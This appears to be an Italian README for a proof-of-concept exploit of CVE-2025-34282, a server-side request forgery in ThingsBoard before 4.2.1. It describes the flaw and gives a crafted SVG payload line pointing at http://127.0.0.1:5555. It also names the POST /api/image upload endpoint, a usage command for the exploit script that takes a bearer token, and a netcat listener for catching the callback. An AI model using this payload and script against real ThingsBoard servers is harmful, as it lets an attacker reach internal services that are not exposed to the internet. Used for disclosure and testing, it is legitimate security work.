
Exploit PoC per CVE-2025-34282 - SSRF in ThingsBoard tramite caricamento di immagini SVG
Vulnerabilità di Server-Side Request Forgery (SSRF) nella piattaforma IoT ThingsBoard nelle versioni precedenti alla 4.2.1.
Un attaccante con accesso Tenant Admin può caricare un file SVG appositamente modificato contenente un riferimento a un URL interno tramite la galleria di caricamento immagini. Quando ThingsBoard elabora l'SVG lato server, recupera l'URL referenziato — consentendo l'accesso a servizi interni non esposti a internet.
| Campo | Dettagli |
|---|
| CVE | CVE-2025-34282 |
| Versione interessata | < 4.2.1 |
| Versione corretta | 4.2.1 |
| Punteggio CVSS | 6.9 Medio |
| CWE | CWE-918 (Server-Side Request Forgery) |
| Fornitore | https://thingsboard.io |
POST /api/image
publicLink dell'SVG tramite un tag <object>
Il payload ssrf_localhost_5555.svg incorpora un riferimento a un URL interno:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
Una volta caricato, il server di ThingsBoard recupera http://127.0.0.1:5555, confermando l'SSRF.
Requisiti:
pip install requests
Esecuzione:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Esempio:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Avviare un listener per intercettare la callback SSRF prima di eseguire l'exploit:
nc -l 5555
Tamil Mathi T.